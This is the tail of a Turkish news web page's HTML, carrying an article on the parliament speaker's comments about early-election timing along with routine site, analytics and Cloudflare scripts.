              <a href="https://www.dunyabulteni.net/haberleri/salg%C4%B1n" title="salgın" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#salgın</a>
              <a href="https://www.dunyabulteni.net/haberleri/patlama" title="patlama" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#patlama</a>
              <a href="https://www.dunyabulteni.net/haberleri/virus" title="virus" target="_blank" class="btn btn-outline-secondary btn-sm mb-2">#virus</a>
          </div>
      </form>
</div>
    <div class="alert text-center cookiealert" role="alert">
    En iyi site deneyimi sağlamak için çerezlerden faydalanıyoruz. Sitemizi kullanmaya devam etmeniz gizlilik politikamızı kabul ettiğiniz anlamına gelmektedir.    <a class="text-white" href="https://www.dunyabulteni.net/gizlilik-ve-kisisel-verilerin-korunmasi-politikasi-s2.html" target="_blank">Detaylar</a>
    <button type="button" class="btn btn-info btn-sm acceptcookies" aria-label="Kapat">
        Tamam    </button>
</div>



<script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script type="application/ld+json">
    {
    "@context": "http:\/\/schema.org",
    "@type": "Organization",
    "url": "https:\/\/www.dunyabulteni.net\/",
    "contactPoint": {
        "@type": "ContactPoint",
        "contactType": "customer service",
        "telephone": "+90 0216 339 45 45"
    },
    "logo": {
        "@type": "ImageObject",
        "url": "https:\/\/www.dunyabulteni.net\/images\/banner\/dunyabulteni_1_1_1.png",
        "width": 191,
        "height": 92
    }
}</script>
<script type="application/ld+json">
    {
    "@context": "http:\/\/schema.org",
    "@type": "WebSite",
    "url": "https:\/\/www.dunyabulteni.net\/",
    "potentialAction": {
        "@type": "SearchAction",
        "target": "https:\/\/www.dunyabulteni.net\/haberleri\/{search_term_string}",
        "query-input": "required name=search_term_string"
    }
}</script>
<script type="application/ld+json">
    {
    "@context": "http:\/\/schema.org",
    "@type": "NewsArticle",
    "articleSection": "Headlines",
    "mainEntityOfPage": {
        "@type": "WebPage",
        "@id": "https:\/\/www.dunyabulteni.net\/guncel\/tbmm-baskani-6-nisan-dan-once-secim-karari-alinmasini-h549596.html"
    },
    "headline": "TBMM Ba\u015fkan\u0131: &#039;6 Nisan&#039;dan \u00f6nce se\u00e7im karar\u0131 al\u0131nmas\u0131n\u0131 beklemiyorum&#039;",
    "name": "TBMM Ba\u015fkan\u0131: &#039;6 Nisan&#039;dan \u00f6nce se\u00e7im karar\u0131 al\u0131nmas\u0131n\u0131 beklemiyorum&#039;",
    "articleBody": "TBMM Ba\u015fkan\u0131 \u015eentop, muhalefetin erken se\u00e7ime ili\u015fkin a\u00e7\u0131klamalar\u0131yla ilgili, \"Se\u00e7imlerin normal tarihi 18 Haziran. Se\u00e7ime y\u00f6nelik bir karar al\u0131nsa bile bunun s\u00fcresi 60 g\u00fcnd\u00fcr. Se\u00e7imlerin \u00f6ne al\u0131nmas\u0131yla ilgili karar yetkisi hem Meclis'te hem Cumhurba\u015fkanl\u0131\u011f\u0131'nda var. 6 Nisan'dan \u00f6nce se\u00e7im karar\u0131 al\u0131nmas\u0131n\u0131 beklemiyorum\" dedi.\n\nTBMM Ba\u015fkan\u0131 \u015eentop, umhurba\u015fkan\u0131 Erdo\u011fan'\u0131n Nobel Bar\u0131\u015f \u00d6d\u00fcl\u00fc'ne adayl\u0131\u011f\u0131 konusunda, \"Benim ba\u015fvurum var. Farkl\u0131 \u00fclkelerden meclis ba\u015fkanlar\u0131 ve milletvekillerinin ba\u015fvurular\u0131 da olacak\" dedi.\n",
    "description": "TBMM Ba\u015fkan\u0131: &#039;6 Nisan&#039;dan \u00f6nce se\u00e7im karar\u0131 al\u0131nmas\u0131n\u0131 beklemiyorum&#039;  ile ilgili haber",
    "keywords": "TBMM Ba\u015fkan\u0131",
    "image": {
        "@type": "ImageObject",
        "url": "https:\/\/www.dunyabulteni.net\/images\/haberler\/2022\/12\/tbmm_baskani_6_nisan_dan_once_secim_karari_alinmasini_beklemiyorum_h549596_989c3.jpg",
        "width": 696,
        "height": 363
    },
    "datePublished": "2022-12-28T13:21:35+03:00",
    "dateModified": "2022-12-28T13:21:35+03:00",
    "genre": "news",
    "wordCount": 106,
    "inLanguage": "tr-TR",
    "author": {
        "@type": "Organization",
        "name": "D\u00fcnya B\u00fclteni"
    },
    "publisher": {
        "@type": "Organization",
        "name": "D\u00fcnya B\u00fclteni",
        "logo": {
            "@type": "ImageObject",
            "url": "https:\/\/www.dunyabulteni.net\/images\/banner\/dunyabulteni_1_1_1.png",
            "width": 191,
            "height": 60
        }
    }
}</script>
<script>
var ELEGANT = {"settings":{"theme_path":"https:\/\/www.dunyabulteni.net\/_themes\/hs-elegant\/","ajax_url":"_ajax\/","site_url":"https:\/\/www.dunyabulteni.net\/","theme":"hs-elegant","analytics":"UA-127080391-1","comment_approved":0,"theme_version":"1.0.5","system_version":"5.15","popup_time":"1","language":"tr","module":"haber","save":true,"follow":false,"id":549596,"category":false}},
    $infinityContainer, _lang = {"unauthorized":"Bu i\u015flemi yapabilmek i\u00e7in \u00fcye giri\u015fi yapmal\u0131s\u0131n\u0131z!","new_notification":"Yeni bildirimleriniz var!","unsave":"Kaydedildi","save":"Kaydet","not_saved_items":"Hen\u00fcz kaydedilmi\u015f bir haber bulunmuyor!","sure_saved_delete":"\u0130\u00e7erik kay\u0131t listesinden \u00e7\u0131kar\u0131ls\u0131n m\u0131?","sure_unfollow":":string takip listesinden \u00e7\u0131kar\u0131ls\u0131n m\u0131?","follow":"Takip Et","unfollow":"Takip ediyorsunuz","password_length":"Yeni parolan\u0131z en az 6 haneli olmal\u0131d\u0131r!","delete":"Sil","read_more":"Devam\u0131n\u0131 oku","close":"Kapat","max_image_error":"En fazla 8 resim ekleyebilirsiniz!","comment_polled":"Daha \u00f6nce bu yorumu oylad\u0131n\u0131z!","email_required":"Ge\u00e7erli bir E-posta adresi girmelisiniz!","email_invalid":"Ge\u00e7erli bir E-posta adresi girmelisiniz!","email_saved":"E-posta adresiniz b\u00fclten listesine eklenmi\u015ftir!","duplicate_email":"E-posta adresi zaten kay\u0131tl\u0131!","yes":"Evet","cancel":"Vazge\u00e7"};
</script>
<script src="https://www.dunyabulteni.net/_themes/hs-elegant/script/bundle.min.js?v=1.1"></script>
<script>
function tebilisim(id, module, page, count_format) {
    $.get(ELEGANT.settings.site_url + '_ajax/tebilisim.php?id=' + id + '&m=' + module + '&page=' + page +
        '&count_format=k',
        function(hit) {
            $(".hitCounter-" + id).html(hit);
        });
}
tebilisim('549596', 'haber',
    '');
</script>
<script>
$(document).ready(function() {
    if($('#title-bar').length > 0) { 
        if($('#left-ad').length > 0) {
            $('#left-ad').css('top',$('#left-ad')[0].offsetTop + 38 + 'px'); 
        } 
        if($('#right-ad').length > 0) {
            $('#right-ad').css('top',$('#right-ad')[0].offsetTop + 38 + 'px'); 
        }
    }
    $('#userAccount a[data-toggle="tab"]').on('show.bs.tab', function(e) {
        localStorage.setItem('activeTab', $(e.target).attr('href'));
    });
    var activeTab = localStorage.getItem('activeTab');
    if (activeTab) {
        $('#userAccount a[href="' + activeTab + '"]').tab('show');
    }
});
</script>
<script>
    $(document).ready(function(){
        if(getCookie('panelshow')=="show"){
            $("#panel-bar").removeClass('d-none');
        }else{
            $("#panel-bar").remove();
        }
    });
</script>




<script>
if ($infinityContainer) {
    $infinityContainer.on('history.infiniteScroll', function(event, title, path) {
        gtag('config', ELEGANT.settings.analytics, {
            'page_path': window.location.pathname
        });
    });
}
</script>








<amp-analytics type="alexametrics">
<script type="application/json"> {"vars": { "atrk_acct": "qgO0r1uhUo20dG", "domain": "dunyabulteni.net" }}</script>
</amp-analytics>
<!-- End Alexa AMP Certify Javascript -->

<script async custom-element="amp-analytics" src="https://cdn.ampproject.org/v0/amp-analytics-0.1.js"></script>





<script>(function(){var js = "window['__CF$cv$params']={r:'780a1f55fcbe208e',m:'0wUgU0zEx5c5SX9_d8EhQMIc_I9gp3QdWrq4xO8GSho-1672228688-0-AUhM9qCtRz0/u74zghXnjP69T6SA+Fsko6DoW0TTpmB8s8yRGxJ2rLtExWBnELuam9h/Kij+2mzxyJI7tIf3Wrolvn29h9pw6xv5oZ0tiiLKyUhcbvo1DVG02x2JfNNZmQaWyDKCdqHCWnowMqaxZ3v0ugRuxzOT946l+1t4hnDXTsCq3TjPXNjX5an6FllP/Mup3Szn7tSWSCWPArzcadQ=',s:[0x60ba1d1a3e,0xf49b1b635e],u:'/cdn-cgi/challenge-platform/h/g'};var now=Date.now()/1000,offset=14400,ts=''+(Math.floor(now)-Math.floor(now%offset)),_cpo=document.createElement('script');_cpo.nonce='',_cpo.src='/cdn-cgi/challenge-platform/h/g/scripts/alpha/invisible.js?ts='+ts,document.getElementsByTagName('head')[0].appendChild(_cpo);";var _0xh = document.createElement('iframe');_0xh.height = 1;_0xh.width = 1;_0xh.style.position = 'absolute';_0xh.style.top = 0;_0xh.style.left = 0;_0xh.style.border = 'none';_0xh.style.visibility = 'hidden';document.body.appendChild(_0xh);function handler() {var _0xi = _0xh.contentDocument || _0xh.contentWindow.document;if (_0xi) {var _0xj = _0xi.createElement('script');_0xj.nonce = '';_0xj.innerHTML = js;_0xi.getElementsByTagName('head')[0].appendChild(_0xj);}}if (document.readyState !== 'loading') {handler();} else if (window.addEventListener) {document.addEventListener('DOMContentLoaded', handler);} else {var prev = document.onreadystatechange || function () {};document.onreadystatechange = function (e) {prev(e);if (document.readyState !== 'loading') {document.onreadystatechange = prev;handler();}};}})();</script></body>

</html>
